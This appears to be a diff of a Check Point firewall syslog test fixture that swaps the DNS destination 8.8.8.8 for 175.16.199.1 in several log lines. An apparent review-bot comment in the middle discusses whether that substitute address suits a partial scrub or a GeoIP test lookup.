@@ -2882,7 +2882,7 @@ <134>1 2020-03-29T17:25:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da26,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50064"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10070"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:26:05Z gw-da58d3 CheckPoint 8363 - [flags:"278528"; ifdir:"inbound"; loguid:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; log_id:"2"; product:"Anti Malware"; received_bytes:"21517"; sent_bytes:"2111"; session_id:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; severity:"2"; suppressed_logs:"2"] <134>1 2020-03-29T17:26:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da2f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T17:26:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da38,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502776"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52272"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:26:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da38,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502776"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52272"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:26:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; 
logid:"0"; loguid:"{0x5e80da39,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"185.33.223.197"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43166"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:26:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da39,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"185.33.223.197"; log_delay:"1585502777"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43168"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:26:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da39,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"185.33.223.197"; log_delay:"1585502777"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43170"; service:"443"; service_id:"https"; src:"192.168.2.2"] 
@@ -2895,8 +2895,8 @@ <134>1 2020-03-29T17:27:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da82,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; log_delay:"1585502850"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43882"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:27:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da84,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T17:27:50Z gw-da58d3 CheckPoint 8363 - [flags:"18688"; ifdir:"inbound"; loguid:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; log_id:"2"; packet_capture_name:"src-192.168.2.2.cap"; packet_capture_time:"1585502870"; packet_capture_unique_id:"time1585502754.id4fcdead8.blade04"; product:"Anti 
Malware"] -<134>1 2020-03-29T17:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da9a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40826"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da9a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502874"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43926"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da9a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40826"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da9a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502874"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43926"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da9a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"188.40.137.18"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49904"; service:"443"; 
service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:27:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da9e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39040"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:27:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da9e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34786"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10071"; xlatesrc:"0.0.0.0"] 
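Review bot: The substitute address `175.16.199.1` on the two `+` lines of this hunk is a routable public address, not an RFC 5737 documentation range (`192.0.2.0/24`, `198.51.100.0/24`, `203.0.113.0/24`), so if the intent is to scrub real-world addresses from this fixture it only trades one public destination for another. The same hunk leaves other public destinations untouched (`188.40.137.18`, `104.81.142.43`, and `162.159.200.1` in the context lines), so the scrub is partial and a reader cannot tell from the data why only `8.8.8.8` was rewritten. If the value was picked to hit a fixed entry in the GeoIP test database used by the pipeline tests, a one-line note in the commit message or the module's test README, e.g. `# 175.16.199.1 is chosen to resolve deterministically in the bundled GeoIP test DB`, would keep the next maintainer from "fixing" it back. Presumably the matching `-expected.json` golden needs the same change in its `destination.ip`/`destination.geo` fields; worth confirming it was regenerated rather than hand-edited.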
@@ -2904,7 +2904,7 @@ <134>1 2020-03-29T17:27:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da9e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50108"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10072"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:27:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da9e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36882"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:27:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da9e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37728"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10073"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T17:28:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80daa2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502882"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53530"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:28:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80daa2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502882"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; 
parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53530"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:28:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80daa4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T17:28:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80dac1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50182"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:28:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dac1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50649"; service:"443"; service_id:"https"; src:"192.168.1.117"] 
@@ -2917,7 +2917,7 @@ <134>1 2020-03-29T17:28:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dace,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"194.29.39.27"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43794"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10074"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:28:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dacf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T17:28:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dacf,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58698"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] -<134>1 2020-03-29T17:28:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dad4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; 